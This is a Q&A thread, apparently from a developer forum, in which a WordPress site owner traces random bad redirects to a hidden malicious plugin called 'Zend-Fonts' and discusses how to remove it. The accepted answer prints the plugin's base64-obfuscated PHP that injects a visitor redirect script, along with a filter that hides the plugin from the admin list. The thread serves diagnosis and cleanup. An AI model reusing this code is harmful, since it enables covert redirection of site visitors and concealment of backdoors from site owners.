# Weird "array URL" Error for WordPress Page

Tags: wordpress

I really couldn't find anything on this, not even somebody with the same problem:

Our WordPress Page recently started giving us errors when navigating through the menu.

Sometimes - but not always - if you click one of the menu items that usually get you to one of the subpages, the called URL in the URL bar gets "deformed" to something like "https://array/?u=t11kd0b&o=zac8myd&m=1".

Which is nonesense and leads to an error, of course.

You have to go back or reload the page and if you click again, the request gets processed normally and the correct page loads and the error is no longer occuring. It seems to be only randomly reproducible.

It seems the error comes back after a restart of the browser...

Any ideas on this?
Is this reproducible for you?

We tried different machines and browsers and it happens on all of them.

Any help would be greatly appreciated!

Comment: In case you are using plugins/custom coding - I would start disabling everything to be sure its not cause by a plugin. You can also check your .htaccess file for redirects or something like this - maybe cause by a `security` plugin

Answer (score 4, accepted):

Ok..... I found the problem. Malware.
It seems to be a problem with a "hidden plugin" called Zend-Fonts which we never installed. It didn't show up in the plugin panel (unless I went through the recovery mode of the health check plugin).

I took a look at the plugin .php file and found the string that appeared in our URL bar at times in this function:

```
if (!$_COOKIE[base64_decode('aHRfcnI=') ]) {
        setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );

        echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url.'/?u=t11kd0b&o=zac8myd&m=1' . base64_decode( 'Ijs8L3NjcmlwdD4=' );
    }
}
```

This seems to be the code to hide the plugin (how nice to document the code properly...):

```
//hide plugin
add_filter('all_plugins', 'hide_plugins');
function hide_plugins($plugins) {
    unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
    return $plugins;
}
```

I couldn't delete the plugin in recovery mode however.... so I removed the plugin's folder in my wordpress installation (wp-contents/plugins/zend-fonts-wp).

Lets hope this is enough....

Google Search did not give me much on that plugin / malware. It seems to want to redirect to some XXX site.

Hope this helps anybody encountering the same.

**EDIT:**
Looking through the plugins code I also found some entries to the WordPress SQL Database.

**I deleted the databases that were referenced in the code
"wp_zen_timetable" and "wpusers_inputs"**

You can identify those are not from WordPress since their type/Engine is MyISAM (all other DBs were InnoDb) - so they stick out if you sort your databases by DB Type.

Comment: HI Did you find how that plugin got into your website? I found this in my WP site as well, along with what you mentioned, I found the log of uploading and installing this plugin in activity log table as well.

Comment: Hey… no - we did not make out how it got in. After removing it, it came back now a couple of days ago! This time with a working redirect to a scam site (not the array error). So check for it from time to time.  We had a freelancer admin account that we now deleted and changed all passwords. Let’s see wether that fixes it permanently.

Comment: Hey thanks for the reply. We didn't get array url , but redirected to porn/scam site.
Does your site has woocommerce plugin installed?

Comment: Also can you list the name of plugins you use, then we can match each other's list and find out which plugin we have in common. And that may be the culprit. Did you have all plugins up-to-date?

Comment: Hey @WatsMyName. The problem came back once after we did the approach described above. After that we changed all passwords. We did have Woocommerce installed but removed it along with a bunch of other plugins that were not absolutely necessary. If the redirect comes back, we will provide a full list of current plugins here.

Comment: What version of Woocommerce you had? I got email from Woocommerce that version below 5.5.1 had security vulnerabilities and they asked us to upgrade it asap. We removed the WooCommerce plugin and Haven't got redirection issue since that.

Comment: Sorry, can't find out anymore since we deleted it a couple of days ago.

Answer (score 1):

Had this malware plugin appear on one of my sites - it predominantly is a link redirect hack. As above we removed the plugin folder and it came back. Removed again & changed all user passwords and activated 2FA but there was still some database activity linked to the removed plugin. Website scans on sucuri also showed issues still.
The only solution we found was to remove/replace all the core wordpress & plugin files.....
My suspicion is that there was malware on a users device which provided the password for the entry point - suggest all users devices are also scanned for malware!